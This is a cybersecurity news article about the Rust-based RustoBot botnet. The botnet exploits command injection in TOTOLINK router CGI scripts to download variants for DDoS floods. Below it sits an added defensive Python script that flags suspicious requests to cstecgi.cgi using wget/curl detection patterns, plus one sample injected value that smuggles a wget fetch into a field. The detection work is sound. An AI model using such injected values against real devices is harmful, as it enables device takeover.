A sophisticated new botnet malware written in the Rust programming language has been discovered targeting vulnerable router devices worldwide. Dubbed “RustoBot” due to its Rust-based implementation, this malware exploits critical vulnerabilities in TOTOLINK and DrayTek router models to execute remote command injections, potentially affecting technology industries across Japan, Taiwan, Vietnam, and Mexico.

The botnet primarily targets TOTOLINK models including N600R, A830R, A3100R, A950RG, A800R, A3000RU, and A810R through vulnerabilities in the cstecgi.cgi file, a CGI script responsible for processing user inputs and administrative commands. These scripts contain command injection flaws that allow attackers to achieve remote code execution on compromised devices. For TOTOLINK devices, the attack uses a crafted request to the vulnerable cstecgi.cgi endpoint with a malicious command string that downloads and executes the malware.

Fortinet researchers identified that after initial compromise, RustoBot deploys multiple architecture-specific variants through four different downloader scripts, targeting arm5, arm6, arm7, mips, and mpsl architectures. The botnet then awaits instructions to launch various DDoS attacks, including UDP flooding, where it generates massive volumes of UDP packets with 1400-byte payloads to specified target IP addresses and ports, overwhelming victim infrastructure.

This emerging threat highlights the persistent vulnerability of IoT and network devices and the evolving sophistication of botnet malware leveraging modern programming languages like Rust for increased stability and cross-platform compatibility.
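A defender with proxy or IDS captures can triage requests to the cstecgi.cgi endpoint described above for command-injection markers. The following is an added example, not code from the article or from Fortinet; the metacharacter and download-tool patterns are generic heuristics chosen here, and the sample requests, field names and addresses are constructed placeholders.

```python
import json
import re
from urllib.parse import parse_qsl, unquote

ENDPOINT = re.compile(r"cstecgi\.cgi", re.IGNORECASE)   # endpoint named in the article
# Assumption: generic shell-injection heuristics, not indicators taken from the article.
SHELL_META = re.compile(r"[;|&`]|\$\(")
FETCH_TOOL = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)


def _param_values(query, body):
    """Collect parameter values from the query string and a JSON or form body."""
    values = [v for _, v in parse_qsl(query, keep_blank_values=True)]
    try:
        doc = json.loads(body)
        if isinstance(doc, dict):
            values += [str(v) for v in doc.values()]
    except ValueError:
        values += [v for _, v in parse_qsl(body, keep_blank_values=True)]
    # One extra decode pass so double percent-encoding (%253B) is still seen.
    return [unquote(v) for v in values]


def classify_request(raw):
    """Return 'ignore', 'benign', 'suspicious' or 'likely-injection'."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split(" ")
    if len(parts) < 2 or not ENDPOINT.search(parts[1]):
        return "ignore"
    query = parts[1].partition("?")[2]
    verdict = "benign"
    for value in _param_values(query, body):
        if SHELL_META.search(value):
            if FETCH_TOOL.search(value):
                return "likely-injection"
            verdict = "suspicious"
    return verdict


# Constructed sample requests (placeholder field names, documentation-range IPs).
SAMPLES = {
    "status": 'POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n{"field": "status"}',
    "fetch": 'POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n{"field": "x;wget http://192.0.2.10/a"}',
    "encoded": "GET /cgi-bin/cstecgi.cgi?field=a%253Bid HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
    "other": "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify_request(raw))
```

Any request to this endpoint arriving from outside the management network is worth reviewing even when it classifies as benign, since the interface is an administrative one.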
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 22 Apr 2025 11:10:12 +0000